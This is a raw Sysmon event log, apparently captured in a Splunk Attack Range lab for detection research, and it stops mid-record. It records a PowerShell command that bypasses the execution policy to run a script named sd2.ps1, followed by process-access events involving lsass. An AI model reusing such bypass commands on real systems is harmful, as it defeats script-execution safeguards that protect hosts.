Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6C7292A642A96B16D71F504A8BDCF31,SHA256=D76C602BEF58EE22F01645A2D7497F10E526B03B86BDBE8D1AF9D4D533A90294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051243Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:44.767{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=13565C4D8EB3E389C63BE667968CFAFD,SHA256=33C31CE8543D501ECD051405B360EFB608E7DC68BE2E78C35CC51167FF8D977E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051242Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:44.644{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051241Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:44.643{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-32DC-60E8-900B-00000000CF01}8936C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051240Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:44.188{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3ADFDAD03EFD815165523203BAB0861,SHA256=0B71B177839017C32B8516F79123D0F0C52B6B7B1E2AF6D6D53E703AA1536A14,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808576Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:42.406{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57335-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808575Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:44.040{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85253943C5A0B647F6CA9ADE2F55BED0,SHA256=B1E510D8B0EEAE217AC5640961523C13EA8D54987BDBB7B5178D467C53E08934,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051256Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.989{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd2.ps1.lnkMD5=D917046EA024B72C907E8A1820E3B965,SHA256=B445EE1AFAEB6AA306351C2E675567DF0F0EC7185B6B90C51E2ED17383500C7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051255Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.989{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051254Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.989{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051253Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.973{466BC892-F5F9-60EB-8A7D-00000000CF01}86124580C:\Windows\system32\conhost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051252Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5F9-60EB-8A7D-00000000CF01}8612C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051251Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051250Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051249Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051248Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051247Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051246Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.942{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\windows.storage.dll+94c4a|C:\Windows\System32\windows.storage.dll+94a02|C:\Windows\System32\SHELL32.dll+3f98d|C:\Windows\System32\SHELL32.dll+3e526|C:\Windows\System32\SHELL32.dll+802b1|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0 154100x80000000000000001051245Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.931{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\sd2.ps1'"C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 23542300x80000000000000001051244Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:45.207{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11D509E413A863FC1975A7F2FD95451C,SHA256=2297C29182E1ACA353BE9E021CA9D8805F1B164749659BC0D187BBF3C11A46FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808577Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:45.086{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6517744F7CAE544EEA1C02EF7905595,SHA256=C3E2A9DE756A4CD992095BD508129E739E2D28450291913F2581A49D2792E46D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808578Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:46.102{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=808DAA861430D7EB33D354347DF0B5AD,SHA256=0385E4A3520D38DF1B585FCD6CC1F78A7CE3C4C009DDD0D8F430864A63A52AEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.976{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FAC64A4ED38ECE062477132436226471,SHA256=2A5F85EE8475D75E911B1B54E5CE775A9A6F620927A4BCB5145BCE6F4FF3A054,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.976{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBA7883246AC61F6D7295D34998F7D07,SHA256=30AA5FE32C2CD21B9BDD15F39C69CE8ED122340156963215DFB535027A087624,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.574{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.574{466BC892-02AD-60E8-0B00-00000000CF01}624808C:\Windows\system32\lsass.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.543{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8E02031235912F37E5AF3E52DF0DF49,SHA256=1976C95A316743C34E381C4DDDBBAF3668EBA0A091B2180480B224F055213E36,IMPHASH=00000000000000000000000000000000falsetrue 17141700x80000000000000001051288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:57:46.512{466BC892-F5F9-60EB-897D-00000000CF01}1072\PSHost.132705502659312887.1072.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001051287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.443{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_spq1gdrt.cr0.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.443{466BC892-F5F9-60EB-897D-00000000CF01}1072ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_md53iyei.q4n.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.408{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Temp\3\__PSScriptPolicyTest_md53iyei.q4n.ps12021-07-12 07:57:46.407 10341000x80000000000000001051284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.343{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F5F9-60EB-897D-00000000CF01}1072C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+2f6d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:46.290{466BC892-F5F9-60EB-897D-00000000CF01}10723144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+609de|C:\Windows\System32\windows.storage.dll+15427c|C:\Windows\System32\windows.storage.dll+154058|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+5b44|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe+42aa|C:\Windows\System32\Windows